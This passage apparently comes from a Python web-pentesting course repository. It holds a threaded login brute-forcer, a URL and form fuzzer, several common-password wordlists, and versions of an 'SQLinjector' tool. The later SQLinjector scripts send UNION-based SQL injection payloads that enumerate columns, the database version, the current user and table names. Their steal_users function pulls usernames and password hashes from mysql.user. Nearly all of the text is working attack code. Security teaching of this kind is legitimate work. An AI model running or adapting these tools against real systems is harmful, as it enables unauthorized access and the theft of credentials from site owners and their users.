74 | f = open(dict, "r")
75 | name = f.readlines()
76 | except:
77 | print"Failed opening file: " + dict + "\n"
78 | sys.exit()
79 | launcher_thread(name, threads, user, url)
80 |
81 |
82 | def launcher_thread(names, th, username, url):
83 | global i
84 | i = []
85 | resultlist = []
86 | i.append(0)
87 | while len(names):
88 | try:
89 | if i[0] < th:
90 | n = names.pop(0)
91 | i[0] = i[0] + 1
92 | thread = request_performer(n, username, url)
93 | thread.start()
94 |
95 | except KeyboardInterrupt:
96 | print "Brute forcer interrupted by user. Finishing attack.."
97 | sys.exit()
98 | thread.join()
99 | return
100 |
101 |
102 | if __name__ == "__main__":
103 | try:
104 | start(sys.argv[1:])
105 | except KeyboardInterrupt:
106 | print "Brute force interrupted by user, killing all threads..!!"
107 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/common.txt:
--------------------------------------------------------------------------------
1 | admin
2 | admin12
3 | asdmin123
4 | asdasd
5 | qwerty
6 | administrat
7 | admin123
8 | administrator123
9 | admi
10 | adm
11 | adm123
12 | 123456
13 | admin
14 | pass
15 | password
16 | mypass
17 | secret
18 | treasure
19 | pass123
20 | pass1234
21 | pass12345
22 | pass123456
23 | admin1
24 | admin2
25 | admin12
26 | admin123
27 | admin1234
28 | admin12345
29 | 654321
30 | qwerty
31 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/forzaBruta-forms.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 | from termcolor import colored
8 |
9 | from selenium import webdriver
10 | from selenium.webdriver.common.keys import Keys
11 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
12 |
13 |
14 | def banner():
15 | print "\n***************************************"
16 | print "* ForzaBruta Forms 0.5*"
17 | print "***************************************"
18 |
19 |
20 | def usage():
21 | print "Usage:"
22 | print " -w: url (http://somesite.com/FUZZ)"
23 | print " -t: threads"
24 | print " -f: dictionary file\n"
25 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
26 |
27 |
28 | class request_performer(Thread):
29 | def __init__(self, word, url, hidecode, payload):
30 | Thread.__init__(self)
31 | self.word = word.split("\n")[0]
32 | self.url = url.replace('FUZZ', self.word)
33 | if payload != "":
34 | self.payload = payload.replace('FUZZ', self.word)
35 | else:
36 | self.payload=payload
37 | self.hidecode = hidecode
38 |
39 | def run(self):
40 | try:
41 | start = time.time()
42 | if self.payload == "":
43 | r = requests.get(self.url)
44 | elaptime = time.time()
45 | totaltime = str(elaptime - start)[1:10]
46 | else:
47 | list=self.payload.replace("="," ").replace("&"," ").split(" ")
48 | payload = dict([(k, v) for k,v in zip (list[::2], list[1::2])])
49 | r = requests.post(self.url, data = payload)
50 | elaptime = time.time()
51 | totaltime = str(elaptime - start)[1:10]
52 |
53 | lines = str(r.content.count("\n"))
54 | chars = str(len(r._content))
55 | words = str(len(re.findall("\S+", r.content)))
56 | code = str(r.status_code)
57 | if r.history != []:
58 | first = r.history[0]
59 | code = str(first.status_code)
60 | else:
61 | pass
62 |
63 | if self.hidecode != chars:
64 | if '200' <= code < '300':
65 | print totaltime + "\t" + colored(code,'green') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines +"\t" + r.headers["server"] + "\t" + self.word
66 | elif '400' <= code < '500':
67 | print totaltime + "\t" + colored(code,'red') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines + "\t" + r.headers["server"] + "\t" + self.word
68 | elif '300' <= code < '400':
69 | print totaltime + "\t" + colored(code,'blue') + " \t\t" + chars + " \t\t" + words + " \t\t " + lines + "\t"+ r.headers["server"] + "\t" + self.word
70 | else:
71 | pass
72 | i[0] = i[0] - 1 # Here we remove one thread from the counter
73 | except Exception, e:
74 | print e
75 |
76 |
77 | def start(argv):
78 | banner()
79 | if len(sys.argv) < 5:
80 | usage()
81 | sys.exit()
82 | try:
83 | opts, args = getopt.getopt(argv, "w:f:t:p:c:")
84 | except getopt.GetoptError:
85 | print "Error en arguments"
86 | sys.exit()
87 | hidecode = 000
88 | payload = ""
89 | for opt, arg in opts:
90 | if opt == '-w':
91 | url = arg
92 | elif opt == '-f':
93 | dict = arg
94 | elif opt == '-t':
95 | threads = arg
96 | elif opt == '-p':
97 | payload = arg
98 | elif opt == '-c':
99 | hidecode = arg
100 | try:
101 | f = open(dict, "r")
102 | words = f.readlines()
103 | except:
104 | print"Failed opening file: " + dict + "\n"
105 | sys.exit()
106 | launcher_thread(words, threads, url, hidecode, payload)
107 |
108 |
109 | def launcher_thread(names, th, url, hidecode,payload):
110 | global i
111 | i = []
112 | resultlist = []
113 | i.append(0)
114 | print "-----------------------------------------------------------------------------------------------------------------------------------"
115 | print "Time" + "\t" + "\t code \t\tchars\t\twords\t\tlines"
116 | print "-----------------------------------------------------------------------------------------------------------------------------------"
117 | while len(names):
118 | try:
119 | if i[0] < th:
120 | n = names.pop(0)
121 | i[0] = i[0] + 1
122 | thread = request_performer(n, url, hidecode, payload)
123 | thread.start()
124 |
125 | except KeyboardInterrupt:
126 | print "ForzaBruta interrupted by user. Finishing attack.."
127 | sys.exit()
128 | thread.join()
129 | return
130 |
131 |
132 | if __name__ == "__main__":
133 | try:
134 | start(sys.argv[1:])
135 | except KeyboardInterrupt:
136 | print "ForzaBruta interrupted by user, killing all threads..!!"
137 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/pass.txt:
--------------------------------------------------------------------------------
1 | admin
2 | asdmini=
3 | userman
4 | manager
5 | powerful
6 | test
7 | administrator
8 | aaaadmin
9 | asdmini=
10 | userman
11 | manager
12 | powerful
13 | test
14 | dmin
15 | asdmini=
16 | userman
17 | manager
18 | admin123
19 | powerful
20 | test
21 | dmin
22 | asdmini=
23 | userman
24 | manager
25 | powerful
26 | test
27 | dmin
28 | asdmini=
29 | userman
30 | manager
31 | powerful
32 | test
33 | aaaaaaaadministrator
34 | aaaadmin
35 | asdmini=
36 | userman
37 | manager
38 | powerful
39 | test
40 | dmin
41 | asdmini=
42 | userman
43 | manager
44 | powerful
45 | administrator123
46 | test
47 | dmin
48 | asdmini=
49 | userman
50 | manager
51 | powerful
52 | test
53 | dmin
54 | asdmini=aaaadministrator
55 | aaaadmin
56 | asdmini=
57 | userman
58 | manager
59 | powerful
60 | test
61 | dmin
62 | asdmini=
63 | userman
64 | manager
65 | powerful
66 | test
67 | dmin
68 | asdmini=
69 | userman
70 | manager
71 | powerful
72 | test
73 | dmin
74 | asdmini=
75 | userman
76 | manager
77 | powerful
78 | test
79 | dministrator
80 | aaaadmin
81 | asdmini=
82 | userman
83 | manager
84 | powerful
85 | test
86 | dmin
87 | asdmini=
88 | userman
89 | manager
90 | powerful
91 | test
92 | dmin
93 | asdmini=
94 | userman
95 | manager
96 | powerful
97 | test
98 | dmin
99 | asdmini=
100 | userman
101 | manager
102 | powerful
103 | test
104 | dministrator
105 | aaaadmin
106 | asdmini=
107 | userman
108 | manager
109 | powerful
110 | test
111 | dmin
112 | asdmini=
113 | userman
114 | manager
115 | powerful
116 | test
117 | dmin
118 | asdmini=
119 | userman
120 | manager
121 | powerful
122 | test
123 | dmin
124 | asdmini=
125 | userman
126 | manager
127 | powerful
128 | test
129 | dministrator
130 | aaaadmin
131 | asdmini=
132 | userman
133 | manager
134 | powerful
135 | test
136 | dmin
137 | asdmini=
138 | userman
139 | manager
140 | powerful
141 | test
142 | dmin
143 | asdmini=
144 | userman
145 | manager
146 | powerful
147 | test
148 | dmin
149 | asdmini=
150 | userman
151 | manager
152 | powerful
153 | test
154 |
155 | userman
156 | manager
157 | powerful
158 | test
159 | dministrator
160 | aaaadmin
161 | asdmini=
162 | userman
163 | manager
164 | powerful
165 | test
166 | dmin
167 | asdmini=
168 | userman
169 | manager
170 | powerful
171 | test
172 | dmin
173 | asdmini=
174 | userman
175 | manager
176 | powerful
177 | test
178 | dmin
179 | asdmini=
180 | userman
181 | manager
182 | powerful
183 | test
184 | dministrator
185 | aaaadmin
186 | asdmini=
187 | userman
188 | manager
189 | powerful
190 | test
191 | dmin
192 | asdmini=
193 | userman
194 | manager
195 | powerful
196 | test
197 | dmin
198 | asdmini=
199 | userman
200 | manager
201 | powerful
202 | test
203 | dmin
204 | asdmini=
205 | userman
206 | manager
207 | powerful
208 | test
209 | dministrator
210 | aaaadmin
211 | asdmini=
212 | userman
213 | manager
214 | powerful
215 | test
216 | dmin
217 | asdmini=
218 | userman
219 | manager
220 | powerful
221 | test
222 | dmin
223 | asdmini=
224 | userman
225 | manager
226 | powerful
227 | test
228 | dmin
229 | asdmini=
230 | userman
231 | manager
232 | powerful
233 | test
234 | dministrator
235 | aaaadmin
236 | asdmini=
237 | userman
238 | manager
239 | powerful
240 | test
241 | dmin
242 | asdmini=
243 | userman
244 | manager
245 | powerful
246 | test
247 | dmin
248 | asdmini=
249 | userman
250 | manager
251 | powerful
252 | test
253 | dmin
254 | asdmini=
255 | userman
256 | manager
257 | powerful
258 | test
259 | dministrator
260 | aaaadmin
261 | asdmini=
262 | userman
263 | manager
264 | powerful
265 | test
266 | dmin
267 | asdmini=
268 | userman
269 | manager
270 | powerful
271 | test
272 | dmin
273 | asdmini=
274 | userman
275 | manager
276 | powerful
277 | test
278 | dmin
279 | asdmini=
280 | userman
281 | manager
282 | powerful
283 | test
284 | dministrator
285 | aaaadmin
286 | asdmini=
287 | userman
288 | manager
289 | powerful
290 | test
291 | dmin
292 | asdmini=
293 | userman
294 | manager
295 | powerful
296 | test
297 | dmin
298 | asdmini=
299 | userman
300 | manager
301 | powerful
302 | test
303 | dmin
304 | asdmini=
305 | userman
306 | manager
307 | powerful
308 | test
309 | dministrator
310 | aaaadmin
311 | asdmini=
312 | userman
313 | manager
314 | powerful
315 | test
316 | dmin
317 | asdmini=
318 | userman
319 | manager
320 | powerful
321 | test
322 | dmin
323 | asdmini=
324 | userman
325 | manager
326 | powerful
327 | test
328 | dmin
329 | asdmini=
330 | userman
331 | manager
332 | powerful
333 | test
334 | aaaaaaaaaaaaaadministrator
335 | aaaadmin
336 | asdmini=
337 | userman
338 | manager
339 | powerful
340 | test
341 | dmin
342 | asdmini=
343 | userman
344 | manager
345 | powerful
346 | test
347 | dmin
348 | asdmini=
349 | userman
350 | manager
351 | powerful
352 | test
353 | dmin
354 | asdmini=
355 | userman
356 | manager
357 | powerful
358 | test
359 | dministrator
360 | aaaadmin
361 | asdmini=
362 | userman
363 | manager
364 | powerful
365 | test
366 | dmin
367 | asdmini=
368 | userman
369 | manager
370 | powerful
371 | test
372 | dmin
373 | asdmini=
374 | userman
375 | manager
376 | powerful
377 | test
378 | dmin
379 | asdmini=
380 | userman
381 | manager
382 | powerful
383 | test
384 | dministrator
385 | aaaadmin
386 | asdmini=
387 | userman
388 | manager
389 | powerful
390 | test
391 | dmin
392 | asdmini=
393 | userman
394 | manager
395 | powerful
396 | test
397 | dmin
398 | asdmini=
399 | userman
400 | manager
401 | powerful
402 | test
403 | dmin
404 | asdmini=
405 | userman
406 | manager
407 | powerful
408 | test
409 | dministrator
410 | aaaadmin
411 | asdmini=
412 | userman
413 | manager
414 | powerful
415 | test
416 | dmin
417 | asdmini=
418 | userman
419 | manager
420 | powerful
421 | test
422 | dmin
423 | asdmini=
424 | userman
425 | manager
426 | powerful
427 | test
428 | dmin
429 | asdmini=
430 | userman
431 | manager
432 | powerful
433 | test
434 | dministrator
435 | aaaadmin
436 | asdmini=
437 | userman
438 | manager
439 | powerful
440 | test
441 | dmin
442 | asdmini=
443 | userman
444 | manager
445 | powerful
446 | test
447 | dmin
448 | asdmini=
449 | userman
450 | manager
451 | powerful
452 | test
453 | dmin
454 | asdmini=
455 | userman
456 | manager
457 | powerful
458 | test
459 | dministrator
460 | aaaadmin
461 | asdmini=
462 | userman
463 | manager
464 | powerful
465 | test
466 | dmin
467 | asdmini=
468 | userman
469 | manager
470 | powerful
471 | test
472 | dmin
473 | asdmini=
474 | userman
475 | manager
476 | powerful
477 | test
478 | dmin
479 | asdmini=
480 | userman
481 | manager
482 | powerful
483 | test
484 | dministrator
485 | aaaadmin
486 | asdmini=
487 | userman
488 | manager
489 | powerful
490 | test
491 | dmin
492 | asdmini=
493 | userman
494 | manager
495 | powerful
496 | test
497 | dmin
498 | asdmini=
499 | userman
500 | manager
501 | powerful
502 | test
503 | dmin
504 | asdmini=
505 | userman
506 | manager
507 | powerful
508 | test
509 | dministrator
510 | aaaadmin
511 | asdmini=
512 | userman
513 | manager
514 | powerful
515 | test
516 | dmin
517 | asdmini=
518 | userman
519 | manager
520 | powerful
521 | test
522 | dmin
523 | asdmini=
524 | userman
525 | manager
526 | powerful
527 | test
528 | dmin
529 | asdmini=
530 | userman
531 | manager
532 | powerful
533 | test
534 | dministrator
535 | aaaadmin
536 | asdmini=
537 | userman
538 | manager
539 | powerful
540 | test
541 | dmin
542 | asdmini=
543 | userman
544 | manager
545 | powerful
546 | test
547 | dmin
548 | asdmini=
549 | userman
550 | manager
551 | powerful
552 | test
553 | dmin
554 | asdmini=
555 | userman
556 | manager
557 | powerful
558 | test
559 | dministrator
560 | aaaadmin
561 | asdmini=
562 | userman
563 | manager
564 | powerful
565 | test
566 | dmin
567 | asdmini=
568 | userman
569 | manager
570 | powerful
571 | test
572 | dmin
573 | asdmini=
574 | userman
575 | manager
576 | powerful
577 | test
578 | dmin
579 | asdmini=
580 | userman
581 | manager
582 | powerful
583 | test
584 | dministrator
585 | aaaadmin
586 | asdmini=
587 | userman
588 | manager
589 | powerful
590 | test
591 | dmin
592 | asdmini=
593 | userman
594 | manager
595 | powerful
596 | test
597 | dmin
598 | asdmini=
599 | userman
600 | manager
601 | powerful
602 | test
603 | dmin
604 | asdmini=
605 | userman
606 | manager
607 | powerful
608 | test
609 | dministrator
610 | aaaadmin
611 | asdmini=
612 | userman
613 | manager
614 | powerful
615 | test
616 | dmin
617 | asdmini=
618 | userman
619 | manager
620 | powerful
621 | test
622 | dmin
623 | asdmini=
624 | userman
625 | manager
626 | powerful
627 | test
628 | dmin
629 | asdmini=
630 | userman
631 | manager
632 | powerful
633 | test
634 | dministrator
635 | aaaadmin
636 | asdmini=
637 | userman
638 | manager
639 | powerful
640 | test
641 | dmin
642 | asdmini=
643 | userman
644 | manager
645 | powerful
646 | test
647 | dmin
648 | asdmini=
649 | userman
650 | manager
651 | powerful
652 | test
653 | dmin
654 | asdmini=
655 | userman
656 | manager
657 | powerful
658 | test
659 | dministrator
660 | aaaadmin
661 | asdmini=
662 | userman
663 | manager
664 | powerful
665 | test
666 | dmin
667 | asdmini=
668 | userman
669 | manager
670 | powerful
671 | test
672 | dmin
673 | asdmini=
674 | userman
675 | manager
676 | powerful
677 | test
678 | dmin
679 | asdmini=
680 | userman
681 | manager
682 | powerful
683 | test
684 |
685 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/passw.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | 1234567
3 | 12345678
4 | 123asdf
5 | Admin
6 | admin
7 | administrator
8 | asdf123
9 | backup
10 | backupexec
11 | changeme
12 | clustadm
13 | cluster
14 | compaq
15 | default
16 | dell
17 | dmz
18 | domino
19 | exchadm
20 | exchange
21 | ftp
22 | gateway
23 | guest
24 | lotus
25 | manager
26 | money
27 | notes
28 | office
29 | oracle
30 | pass
31 | password
32 | password!
33 | password1
34 | print
35 | qwerty
36 | replicate
37 | seagate
38 | secret
39 | sql
40 | sqlexec
41 | temp
42 | temp!
43 | temp123
44 | test
45 | test!
46 | test123
47 | tivoli
48 | veritas
49 | virus
50 | web
51 | www
52 | KKKKKKK
53 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-0.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
44 | def launcher (url,dictio):
45 | injected = []
46 | for sqlinjection in dictio:
47 | injected.append(url.replace("FUZZ",sqlinjection))
48 | res = injector(injected)
49 | print "\n[+] Detection results:"
50 | print "------------------"
51 | for x in res:
52 | print x.split(";")[0]
53 |
54 |
55 | def injector(injected):
56 | errors = ['Mysql','error in your SQL']
57 | results = []
58 | for y in injected:
59 | print "[-] Testing errors: " + y
60 | req=requests.get(y)
61 | for x in errors:
62 | if req.content.find(x) != -1:
63 | res = y + ";" + x
64 | results.append(res)
65 | return results
66 |
67 | if __name__ == "__main__":
68 | try:
69 | start(sys.argv[1:])
70 | except KeyboardInterrupt:
71 | print "SQLinjector interrupted by user..!!"
72 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-1.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
44 | def launcher (url,dictio):
45 | injected = []
46 | for sqlinjection in dictio:
47 | injected.append(url.replace("FUZZ",sqlinjection))
48 | res = injector(injected)
49 | print "\n[+] Detection results:"
50 | print "------------------"
51 | for x in res:
52 | print x.split(";")[0]
53 |
54 | print "\n[+] Detect columns: "
55 | print "-----------------"
56 | res = detect_columns(url)
57 | print "Number of columns: " + res
58 | res = detect_columns_names(url)
59 |
60 | print "\n[+] Columns names found: "
61 | print "-------------------------"
62 | for col in res:
63 | print col
64 |
65 | def injector(injected):
66 | errors = ['Mysql','error in your SQL']
67 | results = []
68 | for y in injected:
69 | print "[-] Testing errors: " + y
70 | req=requests.get(y)
71 | for x in errors:
72 | if req.content.find(x) != -1:
73 | res = y + ";" + x
74 | results.append(res)
75 | return results
76 |
77 | def detect_columns(url):
78 | new_url= url.replace("FUZZ","admin' order by X-- -")
79 | y=1
80 | while y < 20:
81 | req=requests.get(new_url.replace("X",str(y)))
82 | if req.content.find("Unknown") == -1:
83 | y+=1
84 | else:
85 | break
86 | return str(y-1)
87 |
88 | def detect_columns_names(url):
89 | column_names = ['username','user','name','pass','passwd','password','id','role','surname','address']
90 | new_url= url.replace("FUZZ","admin' group by X-- -")
91 | valid_cols = []
92 | for name in column_names:
93 | req=requests.get(new_url.replace("X",name))
94 | if req.content.find("Unknown") == -1:
95 | valid_cols.append(name)
96 | else:
97 | pass
98 | return valid_cols
99 |
100 | if __name__ == "__main__":
101 | try:
102 | start(sys.argv[1:])
103 | except KeyboardInterrupt:
104 | print "SQLinjector interrupted by user..!!"
105 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-2.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
44 | def launcher (url,dictio):
45 | injected = []
46 |
47 | for x in dictio:
48 | sqlinjection=x
49 | injected.append(url.replace("FUZZ",sqlinjection))
50 | res = injector(injected)
51 |
52 | print colored('[+] Detection results:','green')
53 | print "------------------"
54 | for x in res:
55 | print x.split(";")[0]
56 |
57 | print colored ('[+] Detect columns: ','green')
58 | print "-----------------"
59 | res = detect_columns(url)
60 | print "Number of columns: " + res
61 | res = detect_columns_names(url)
62 |
63 | print "[+] Columns names found: "
64 | print "-------------------------"
65 | for col in res:
66 | print col
67 |
68 | print colored('[+] DB version: ','green')
69 | print "---------------"
70 | detect_version(url)
71 |
72 | print colored('[+] Current USER: ','green')
73 | print "---------------"
74 | detect_user(url)
75 |
76 | print colored('[+] Attempting MYSQL user extraction','green')
77 | print "-------------------------------------"
78 | steal_users(url)
79 |
80 | sys.exit()
81 |
82 |
83 | def injector(injected):
84 | errors = ['Mysql','error in your SQL']
85 | results = []
86 | for y in injected:
87 | print "[-] Testing errors: " + y
88 | req=requests.get(y)
89 | for x in errors:
90 | if req.content.find(x) != -1:
91 | res = y + ";" + x
92 | results.append(res)
93 | return results
94 |
95 | def detect_columns(url):
96 | new_url= url.replace("FUZZ","admin' order by X-- -")
97 | y=1
98 | while y < 20:
99 | req=requests.get(new_url.replace("X",str(y)))
100 | if req.content.find("Unknown") == -1:
101 | y+=1
102 | else:
103 | break
104 | return str(y-1)
105 |
106 | def steal_users(url):
107 | new_url= url.replace("FUZZ","""1\'%20union%20SELECT%20CONCAT
108 | ('TOK',user,'TOK'),CONCAT('TOK',password,'TOK')%20FROM
109 | %20mysql.user--%20-""")
110 | req=requests.get(new_url)
111 | reg = ur"TOK([\*a-zA-Z0-9].+?)TOK+?"
112 | users=re.findall(reg,req.content)
113 | for user in users:
114 | print user
115 |
116 | def detect_user(url):
117 | new_url= url.replace("FUZZ","""\'%20union%20SELECT%201,CONCAT('TOK',user(),
118 | 'TOK')--%20-""")
119 | req=requests.get(new_url)
120 | raw = req.content
121 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
122 | users=re.findall(reg,req.content)
123 | for user in users:
124 | print user
125 | return user
126 |
127 | def detect_version(url):
128 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK')--%20-")
129 | req=requests.get(new_url)
130 | raw = req.content
131 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
132 | version=re.findall(reg,req.content)
133 | for ver in version:
134 | print ver
135 | return ver
136 |
137 |
138 |
139 | def detect_columns_names(url):
140 | column_names = ['username','user','name','pass','passwd','password','id','role','surname','address']
141 | new_url= url.replace("FUZZ","admin' group by X-- -")
142 | valid_cols = []
143 | for name in column_names:
144 | req=requests.get(new_url.replace("X",name))
145 | if req.content.find("Unknown") == -1:
146 | valid_cols.append(name)
147 | else:
148 | pass
149 | return valid_cols
150 |
151 | if __name__ == "__main__":
152 | try:
153 | start(sys.argv[1:])
154 | except KeyboardInterrupt:
155 | print "SQLinjector interrupted by user..!!"
156 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-3.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
27 | except getopt.GetoptError:
28 | print "Error en arguments"
29 | sys.exit()
30 | for opt,arg in opts :
31 | if opt == '-w' :
32 | url=arg
33 | elif opt == '-i':
34 | dictio = arg
35 | try:
36 | print "[-] Opening injections file: " + dictio
37 | f = open(dictio, "r")
38 | name = f.read().splitlines()
39 | except:
40 | print"Failed opening file: "+ dictio+"\n"
41 | sys.exit()
42 | launcher(url,name)
43 |
44 | def launcher (url,dictio):
45 | injected = []
46 |
47 | for x in dictio:
48 | sqlinjection=x
49 | injected.append(url.replace("FUZZ",sqlinjection))
50 | res = injector(injected)
51 |
52 | print colored('[+] Detection results:','green')
53 | print "------------------"
54 | for x in res:
55 | print x.split(";")[0]
56 |
57 | print colored ('[+] Detect columns: ','green')
58 | print "-----------------"
59 | res = detect_columns(url)
60 | print "Number of columns: " + res
61 | res = detect_columns_names(url)
62 |
63 | print "[+] Columns names found: "
64 | print "-------------------------"
65 | for col in res:
66 | print col
67 |
68 | print colored('[+] DB version: ','green')
69 | print "---------------"
70 | detect_version(url)
71 |
72 | print colored('[+] Current USER: ','green')
73 | print "---------------"
74 | detect_user(url)
75 |
76 | print colored('[+] Get tables names:','green')
77 | print "---------------------"
78 | detect_table_names(url)
79 |
80 |
81 | def injector(injected):
82 | errors = ['Mysql','error in your SQL']
83 | results = []
84 | for y in injected:
85 | print "[-] Testing errors: " + y
86 | req=requests.get(y)
87 | for x in errors:
88 | if req.content.find(x) != -1:
89 | res = y + ";" + x
90 | results.append(res)
91 | return results
92 |
93 | def detect_columns(url):
94 | new_url= url.replace("FUZZ","admin' order by X-- -")
95 | y=1
96 | while y < 20:
97 | req=requests.get(new_url.replace("X",str(y)))
98 | if req.content.find("Unknown") == -1:
99 | y+=1
100 | else:
101 | break
102 | return str(y-1)
103 |
104 | def detect_version(url):
105 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',@@version,'TOK')--%20-")
106 | req=requests.get(new_url)
107 | raw = req.content
108 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
109 | version=re.findall(reg,req.content)
110 | for ver in version:
111 | print ver
112 | return ver
113 |
114 | def detect_user(url):
115 | new_url= url.replace("FUZZ","\'%20union%20SELECT%201,CONCAT('TOK',user(),'TOK')--%20-")
116 | req=requests.get(new_url)
117 | raw = req.content
118 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
119 | users=re.findall(reg,req.content)
120 | for user in users:
121 | print user
122 | return user
123 |
124 | def steal_users(url):
125 | new_url= url.replace("FUZZ","1\'%20union%20SELECT%20CONCAT('TOK',user,'TOK'),CONCAT('TOK',password,'TOK')%20FROM%20mysql.user--%20-")
126 | req=requests.get(new_url)
127 | reg = ur"TOK([\*a-zA-Z0-9].+?)TOK+?"
128 | users=re.findall(reg,req.content)
129 | for user in users:
130 | print user
131 |
132 |
133 | def detect_table_names(url):
134 | new_url= url.replace("FUZZ","""\'%20union%20SELECT%20CONCAT('TOK',
135 | table_schema,'TOK'),CONCAT('TOK',table_name,'TOK')%20FROM
136 | %20information_schema.tables%20WHERE%20table_schema%20!=%20
137 | %27mysql%27%20AND%20table_schema%20!=%20%27information_schema%27
138 | %20and%20table_schema%20!=%20%27performance_schema%27%20--%20-""")
139 | req=requests.get(new_url)
140 | raw = req.content
141 | reg = ur"TOK([a-zA-Z0-9].+?)TOK+?"
142 | tables=re.findall(reg,req.content)
143 | for table in tables:
144 | print table
145 |
146 |
147 | def detect_columns_names(url):
148 | column_names = ['username','user','name','pass','passwd','password','id','role','surname','address']
149 | new_url= url.replace("FUZZ","admin' group by X-- -")
150 | valid_cols = []
151 | for name in column_names:
152 | req=requests.get(new_url.replace("X",name))
153 | if req.content.find("Unknown") == -1:
154 | valid_cols.append(name)
155 | else:
156 | pass
157 | return valid_cols
158 |
159 | if __name__ == "__main__":
160 | try:
161 | start(sys.argv[1:])
162 | except KeyboardInterrupt:
163 | print "SQLinjector interrupted by user..!!"
164 |
--------------------------------------------------------------------------------
/Examples/Chapter06/Section-6/SQLinjector-4.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import sys
3 | import getopt
4 | import re
5 | from termcolor import colored
6 |
7 |
8 | def banner():
9 | print "\n***************************************"
10 | print "* SQlinjector 1.0 *"
11 | print "***************************************"
12 |
13 | def usage():
14 | print "Usage:"
15 | print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
16 | print " -i: injection strings file \n"
17 | print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
18 |
19 |
20 | def start(argv):
21 | banner()
22 | if len(sys.argv) < 2:
23 | usage()
24 | sys.exit()
25 | try:
26 | opts, args = getopt.getopt(argv,"w:i:")
